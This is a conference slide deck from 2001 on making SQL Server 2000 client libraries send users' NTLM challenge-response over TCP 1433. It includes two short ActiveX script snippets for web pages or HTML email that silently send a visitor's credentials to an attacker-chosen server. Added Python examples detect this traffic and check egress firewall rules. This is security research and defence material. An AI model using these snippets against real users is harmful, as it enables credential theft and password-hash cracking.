Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…

Timothy M. Mullen AnchorIS.Com, Inc.

[email protected]

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

The Culprit: SQL2000 Super Sockets Lib
  • New functions in dbnetlib.dll!
  • Supports TCP/IP Sockets, encryption, authentication, etc.
  • Default library on workstations that have SQL2k client utilities installed. (MSDE as well?)


Backgrounders…
  • SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts)
  • Integrated Authentication (NTLM Creds) needed Named Pipes
  • Named Pipes required 139/445 open to authenticating system.


Backgrounders… cont.
  • Integrated Authentication has _always_ been the recommended configuration.
  • 139/445 has long been blocked at the router (if not, you are a yum-yum.)
  • Many server-to-server apps authenticate over TCP 1433 because it is “safe” .


The Skinny
  • DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433.
  • The LM/NTLM challenge/response pairs can now be sent out via 1433 (or other ports if changed)
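What this looks like on the wire, from the monitoring side: the NTLM messages ride inside TDS packets, so a sensor watching TCP 1433 can spot an NTLMSSP AUTHENTICATE leaving a workstation for a host that is not a known SQL Server. The following Python is an added example written for this page, not code from the talk. It assumes the 8-byte TDS header and the NTLMSSP type 3 layout from MS-TDS and MS-NLMP, a constructed allowlist network KNOWN_SQL_SERVERS, and a constructed sample packet whose LM/NT response fields are zero-filled (it only exercises the parser).

```python
import struct
from ipaddress import ip_address, ip_network

# Assumption for this example: the only SQL Servers that workstations should ever
# authenticate to live in this constructed internal range.
KNOWN_SQL_SERVERS = [ip_network("10.1.0.0/16")]

TDS_TYPE_LOGIN7 = 0x10      # TDS7 login packet (may carry an NTLMSSP NEGOTIATE)
TDS_TYPE_SSPI = 0x11        # SSPI continuation packet (carries the NTLMSSP AUTHENTICATE)
NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLM_AUTHENTICATE = 3
NTLM_NEGOTIATE_UNICODE = 0x00000001


def parse_tds_header(packet):
    """Return (packet type, payload). TDS header: type, status, big-endian length, SPID, id, window."""
    if len(packet) < 8:
        raise ValueError("short TDS packet")
    ptype, _status, length = struct.unpack(">BBH", packet[:4])
    if length > len(packet):
        raise ValueError("TDS length field exceeds captured data")
    return ptype, packet[8:length]


def _ntlm_field(msg, offset):
    """Resolve an NTLM (Len, MaxLen, BufferOffset) descriptor to the bytes it points at."""
    length, _maxlen, start = struct.unpack("<HHI", msg[offset:offset + 8])
    return msg[start:start + length]


def parse_ntlm_authenticate(blob):
    """Pull the identity fields out of an NTLMSSP AUTHENTICATE (type 3) message."""
    flags = struct.unpack("<I", blob[60:64])[0]
    enc = "utf-16-le" if flags & NTLM_NEGOTIATE_UNICODE else "latin-1"
    return {
        "domain": _ntlm_field(blob, 28).decode(enc),
        "user": _ntlm_field(blob, 36).decode(enc),
        "workstation": _ntlm_field(blob, 44).decode(enc),
        "nt_response_len": len(_ntlm_field(blob, 20)),
    }


def inspect_client_packet(dst_ip, packet):
    """Alert when a client->server TDS packet carries NTLMSSP to a host outside the allowlist."""
    ptype, payload = parse_tds_header(packet)
    if ptype not in (TDS_TYPE_LOGIN7, TDS_TYPE_SSPI):
        return None
    idx = payload.find(NTLMSSP_SIGNATURE)
    if idx < 0:
        return None
    if any(ip_address(dst_ip) in net for net in KNOWN_SQL_SERVERS):
        return None
    blob = payload[idx:]
    msg_type = struct.unpack("<I", blob[8:12])[0]
    alert = {"dst": dst_ip, "tds_type": ptype, "ntlm_type": msg_type}
    if msg_type == NTLM_AUTHENTICATE:
        alert.update(parse_ntlm_authenticate(blob))   # the packet that carries the response
    return alert


# --- constructed test traffic (not a real capture) ---------------------------------

def build_ntlm_authenticate(domain, user, workstation):
    """Build a minimal type 3 message with zero-filled LM/NT responses, for testing the parser only."""
    payloads = [b"\x00" * 24, b"\x00" * 24,            # LM and NT response placeholders
                domain.encode("utf-16-le"), user.encode("utf-16-le"),
                workstation.encode("utf-16-le"), b""]  # no session key
    descriptors, body, offset = b"", b"", 64           # fixed header is 64 bytes
    for data in payloads:
        descriptors += struct.pack("<HHI", len(data), len(data), offset)
        body += data
        offset += len(data)
    return (NTLMSSP_SIGNATURE + struct.pack("<I", NTLM_AUTHENTICATE)
            + descriptors + struct.pack("<I", NTLM_NEGOTIATE_UNICODE) + body)


def build_tds_packet(ptype, payload):
    """Wrap a payload in an 8-byte TDS header (status 0x01 = end of message)."""
    return struct.pack(">BBHHBB", ptype, 0x01, 8 + len(payload), 0, 1, 0) + payload


SAMPLE_AUTH = build_tds_packet(TDS_TYPE_SSPI, build_ntlm_authenticate("CORP", "alice", "WS01"))
SAMPLE_QUERY = build_tds_packet(0x01, "select 1".encode("utf-16-le"))   # SQL batch, no creds

if __name__ == "__main__":
    print(inspect_client_packet("203.0.113.5", SAMPLE_AUTH))   # alert: creds leaving the network
    print(inspect_client_packet("10.1.1.1", SAMPLE_AUTH))      # None: known server
    print(inspect_client_packet("203.0.113.5", SAMPLE_QUERY))  # None: no NTLMSSP present
```

The allowlist check is the important part: the same NTLMSSP blob to an internal SQL Server is normal traffic, so the alert fires only on the destination being unexpected, and the parsed domain/user tells the responder whose credentials were exposed.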


The Problem
  • Many routers, though specifically blocking 139/445, still allow established traffic out, i.e. 1433 outbound is free to pass.
  • Many have 1433 explicitly open for application support, server-to-server queries, etc.
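The two egress policies the slide contrasts, simulated so the gap is visible before the traffic ever leaves. This is an added example, not from the talk: the rule tuples, the first-match semantics, and the addresses (10.1.0.0/16 as the known SQL Server range, 203.0.113.5 as an arbitrary outside host) are all constructed assumptions.

```python
from ipaddress import ip_address, ip_network

# Constructed rule tuples: (action, direction, dst_network, dst_ports); None = any port.
# First matching rule wins, as on most packet filters; no match falls through to deny.
WEAK_EGRESS = [
    ("deny", "out", "0.0.0.0/0", {139, 445}),    # SMB/NetBIOS blocked at the router...
    ("allow", "out", "0.0.0.0/0", None),         # ...but any other outbound session is free to pass
]

HARDENED_EGRESS = [
    ("deny", "out", "0.0.0.0/0", {139, 445}),
    ("allow", "out", "10.1.0.0/16", {1433}),     # SQL only to the known internal servers
    ("allow", "out", "0.0.0.0/0", {80, 443}),    # ordinary web traffic
    ("deny", "out", "0.0.0.0/0", None),          # default deny: integrated auth cannot leave
]


def evaluate(rules, direction, dst_ip, dst_port):
    """Return the action of the first rule matching this flow, or 'deny' if none does."""
    dst = ip_address(dst_ip)
    for action, rdir, net, ports in rules:
        if rdir != direction:
            continue
        if dst not in ip_network(net):
            continue
        if ports is not None and dst_port not in ports:
            continue
        return action
    return "deny"


def auth_egress_report(rules, external_ip="203.0.113.5"):
    """Which of the ports an NTLM handshake can ride on (139, 445, 1433) reach an outside host?"""
    return {port: evaluate(rules, "out", external_ip, port) for port in (139, 445, 1433)}


if __name__ == "__main__":
    print("weak:    ", auth_egress_report(WEAK_EGRESS))       # 1433 still allowed
    print("hardened:", auth_egress_report(HARDENED_EGRESS))   # all denied
    print("internal SQL still works:", evaluate(HARDENED_EGRESS, "out", "10.1.1.1", 1433))
```

The report function is deliberately restricted to the three ports the talk is about; run it against an exported rule set and a 1433 entry that reads "allow" for an outside address is exactly the hole described above.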


The Sting
  • Client side ODBC connections can specify the target server, authentication type, and the library to use.
  • Web sites can request client to perform ADODB recordset requests, as well as other tasks.
  • HTML email as well.


Somewhat Lame Example
  • Web site with following tag:

{
  conn = new ActiveXObject("ADODB.Connection");
  // Integrated Security=SSPI with Network Library=dbnetlib: the NTLM exchange goes to Data Source over TCP 1433
  conn.ConnectionString = 'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
  conn.Open();
}


Example Cont…
  • User is presented with “This page is accessing a data source from another domain. Do you want to allow this?” dialog box.
  • Easily engineered around…


Not So Lame Example
  • Let’s try this one:

{
  ns = new ActiveXObject("SQLNS.SQLNamespace");
  // Trusted_Connection=Yes: integrated (NTLM) authentication through the same dbnetlib library
  ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
}


What’s the difference?
  • SQLNamespace, SQL Distribution Control, and SQL Merge control are all scriptable, and are marked _safe for scripting_ !
  • Silently grab the creds for fun and profit!


Live Demo
  • Don’t try this at home! Professional driver on closed course.



Thanks!

AnchorIS.Com www.anchoris.com

HammerofGod www.hammerofgod.com

Timothy M. Mullen [email protected]

[email protected]
